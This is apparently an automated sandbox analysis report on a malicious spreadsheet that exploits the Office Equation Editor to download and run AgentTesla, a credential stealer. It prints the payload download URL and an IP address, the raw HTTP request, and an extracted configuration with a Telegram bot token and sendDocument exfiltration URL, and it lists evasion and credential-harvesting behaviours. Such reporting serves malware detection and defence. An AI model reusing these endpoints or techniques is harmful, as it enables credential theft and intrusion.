Loading ...

Play interactive tourEdit tour

Analysis Report New Order for April#89032.xlsx

Overview

General Information

Sample Name:New Order for April#89032.xlsx
Analysis ID:383941
MD5:d7928e685d37d907d102cecdf3d3ce8b
SHA1:3404ab865cdfb6c4a71151f5ae7bd17b92206885
SHA256:a2bfcc72f1a7a817323c32d758b45716541e4c3a7e33a7d3939638a6a2e8eaaa
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

AgentTesla Telegram RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses the Telegram API (likely for C&C communication)
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2232 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2548 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2672 cmdline: 'C:\Users\Public\vbc.exe' MD5: 5F968F612F82F74C96DD257793CF917D)
      • vbc.exe (PID: 2868 cmdline: C:\Users\Public\vbc.exe MD5: 5F968F612F82F74C96DD257793CF917D)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1063661839", "Chat URL": "https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocument"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2380779380.0000000002560000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.vbc.exe.3446ec0.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              5.2.vbc.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                4.2.vbc.exe.3446ec0.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.23.174.104, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2548, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                  Sigma detected: File Dropped By EQNEDT32EXEShow sources
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2548, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus detection for URL or domainShow sources
                  Source: http://198.23.174.104/hkn.exeAvira URL Cloud: Label: malware
                  Found malware configurationShow sources
                  Source: 5.2.vbc.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1063661839", "Chat URL": "https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocument"}
                  Multi AV Scanner detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exeReversingLabs: Detection: 16%
                  Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 16%
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: New Order for April#89032.xlsxReversingLabs: Detection: 31%
                  Machine Learning detection for dropped fileShow sources
                  Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exeJoe Sandbox ML: detected

                  Exploits:

                  barindex
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49168 version: TLS 1.2
                  Source: excel.exeMemory has grown: Private usage: 4MB later: 74MB
                  Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                  Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                  Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                  Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                  Source: global trafficDNS query: name: api.telegram.org
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.23.174.104:80

                  Networking:

                  barindex
                  Uses the Telegram API (likely for C&C communication)Show sources
                  Source: unknownDNS query: name: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 08 Apr 2021 10:50:31 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27Last-Modified: Thu, 08 Apr 2021 08:14:53 GMTETag: "d7200-5bf71a458267a"Accept-Ranges: bytesContent-Length: 881152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7d bb 6e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2a 0a 00 00 46 03 00 00 00 00 00 66 49 0a 00 00 20 00 00 00 60 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 49 0a 00 4f 00 00 00 00 60 0a 00 2c 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c 29 0a 00 00 20 00 00 00 2a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 42 03 00 00 60 0a 00 00 44 03 00 00 2c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0d 00 00 02 00 00 00 70 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 49 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 80 3f 00 00 cc 48 00 00 03 00 00 00 01 00 00 06 4c 88 00 00 c8 c0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1f 00 00 0a 28 20 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 21 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 22 00 00 0a 00 02 16 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 16 28 26 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 6c 00 00 06 28 27 00 00 0a 00 2a 26 00 02 28 28 00 00 0a 00 2a ce 73 29 00 00 0a 80 01 00 00 04 73 2a 00 00 0a 80 02 00 00 04 73 2b 00 00 0a 80 03 00 00 04 73 2c 00 00 0a 80 04 00 00 04 73 2d 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 31 00 00 0a 0
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 198.23.174.104 198.23.174.104
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                  Source: global trafficHTTP traffic detected: GET /hkn.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.174.104Connection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.23.174.104
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\65BB8ECE.emfJump to behavior
                  Source: global trafficHTTP traffic detected: GET /hkn.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.174.104Connection: Keep-Alive
                  Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: unknownDNS traffic detected: queries for: api.telegram.org
                  Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                  Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                  Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmpString found in binary or memory: http://WrqCET.com
                  Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpString found in binary or memory: http://api.telegram.org
                  Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/0
                  Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
                  Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpString found in binary or memory: http://certs.godaddy.com/repository/1301
                  Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: vbc.exe, 00000005.00000002.2380259910.00000000005B7000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdig2s1-1823.crl0
                  Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
                  Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
                  Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/0
                  Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/02
                  Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/05
                  Source: vbc.exe, 00000005.00000002.2381723294.0000000005DC0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                  Source: vbc.exe, 00000004.00000002.2167842702.00000000023A1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: vbc.exe, 00000005.00000002.2381723294.0000000005DC0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                  Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: vbc.exe, 00000005.00000002.2380811356.00000000025A4000.00000004.00000001.sdmpString found in binary or memory: https://YiNu10TJVGgbJcx5.com
                  Source: vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org
                  Source: vbc.exe, 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/
                  Source: vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380230451.0000000000583000.00000004.00000020.sdmpString found in binary or memory: https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocument
                  Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocumentdocument-----
                  Source: vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgP
                  Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmpString found in binary or memory: https://certs.godaddy.com/repository/0
                  Source: vbc.exe, vbc.exe, 00000005.00000002.2380578713.0000000000DB2000.00000020.00020000.sdmp, vbc.exe.2.drString found in binary or memory: https://dist.nuget.org/win-x86-commandline/latest/nuget.exe
                  Source: vbc.exe, vbc.exe.2.drString found in binary or memory: https://github.com/Spegeli/Pokemon-Go-Rocket-API/archive/master.zip
                  Source: vbc.exe, vbc.exe, 00000005.00000002.2380578713.0000000000DB2000.00000020.00020000.sdmp, vbc.exe.2.drString found in binary or memory: https://github.com/d-haxton/HaxtonBot/archive/master.zip
                  Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                  Source: vbc.exe, 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                  Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49168 version: TLS 1.2

                  System Summary:

                  barindex
                  Office equation editor drops PE fileShow sources
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                  Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                  Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                  Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                  Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00535404 NtQueryInformationProcess,
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0053539F NtQueryInformationProcess,
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00DB2050
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0053F050
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00530288
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005362B0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00538378
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00532402
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005374D0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00535700
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005327D8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005339C1
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00536AE0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00533DA0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0053E190
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00539278
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0053926A
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0053539F
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0053A450
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0053A460
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0053B5C0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0053A670
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0053A680
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005327C8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0053E830
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0053A8C0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0053A8B0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00539908
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0053AAB9
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00539E10
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00539E00
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00530E20
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00DA0048
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00DA1960
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00DA4A80
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00DA46BF
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00DA2880
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00DA286F
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00DA4C64
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00DA0012
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00DA1950
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00DA1E17
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00DA1E28
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00DB2050
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00456048
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00455430
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00455778
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_004599A8
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_0045E9A8
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_0045C1F8
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00452198
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_0045E3F8
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_0045D6F9
